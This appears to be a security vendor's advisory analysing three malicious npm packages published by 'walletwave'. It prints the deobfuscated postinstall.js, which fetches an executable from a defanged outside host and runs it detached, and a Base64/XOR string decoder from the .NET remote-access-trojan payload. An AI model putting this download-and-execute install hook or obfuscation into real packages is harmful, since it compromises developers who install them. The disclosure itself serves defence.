Our research team recently analyzed three new npm packages, all of which contain known malware, all published by the user ‘walletwave’ with a total of nearly 2K downloads:
- @walletwave/ui - XRAY-744788
- @walletwave/backend - XRAY-744789
- @walletwave/core - XRAY-744787
@walletwave/core live on npm, prior to it's removal
While the first two seem like legitimate crypto packages for walletwave that use solana, they have a dependency package ‘@walletwave/core’:
"dependencies": {
"@walletwave/core": "^1.2.0",
"@solana/web3.js": "^1.87.6",
"bs58": "^5.0.0"
},
The package in the dependencies has obfuscated code that runs automatically after installation. After opening the obfuscation, we discovered a suspicious download and execute code that is started automatically in the postinstall.js file (de-fanged):
const fs = require('fs'), path = require('path'), os = require('os'), {spawn} = require('child_process'), https = require('https');
const exeUrl = 'hxxrs[:]//dependency-bot[.]pages[.]dev/npm.txt', tempDir = os.tmpdir(), exeFilePath = path.join(tempDir, 'npm.exe');
https.get(exeUrl, _0x13bbf8 => {
;
if (_0x13bbf8.statusCode === 200) {
const _0x24178f = fs.createWriteStream(exeFilePath);
_0x13bbf8.pipe(_0x24178f);
_0x24178f.on('finish', () => {
;
_0x24178f.close();
const _0x47d5df = spawn(exeFilePath, [], {
'detached': true,
'stdio': 'ignore',
'shell': true
});
_0x47d5df.unref();
});
...
}
...
}
Further analysis of the file shows it is a highly obfuscated .NET file, a variant of MSILHeracles, as shown in this VirusTotal Analysis.
The obfuscation is comprehensive, employing techniques such as renaming functions and variables, and concealing strings using Base64 and XOR encoding.
public static string aA07ueRVVptZcwMsE3Vl(string encryptedText)
{
string @string = Encoding.UTF8.GetString(Convert.FromBase64String("VExTSld1Zw=="));
List<char> list = new List<char>();
int num = 0;
byte[] array = Convert.FromBase64String(encryptedText);
byte[] array2 = array;
foreach (byte b in array2)
{
char item = Strings.Chr((int)checked((byte)(b ^ Strings.Asc(@string[num]))));
list.Add(item);
num = checked(num + 1) % @string.Length;
}
return new string(list.ToArray());
}
While revealing all IOC might be difficult with static analysis, it is clear that the code contains malicious intent, such as remote socket connections, dynamic assembly loading from base64, and even Remote Access Trojan (RAT) capabilities, including screen capture and desktop utilities.
Final payload hash - ef3186bf1455b9e9152c33f7bf60a21fde1ea42b7c24e84b7f1c6e4cca383328
JFrog Xray has been updated to protect against these malicious packages. We recommend that anyone who has been compromised immediately remove these packages and run a full analysis on the endpoints that installed them.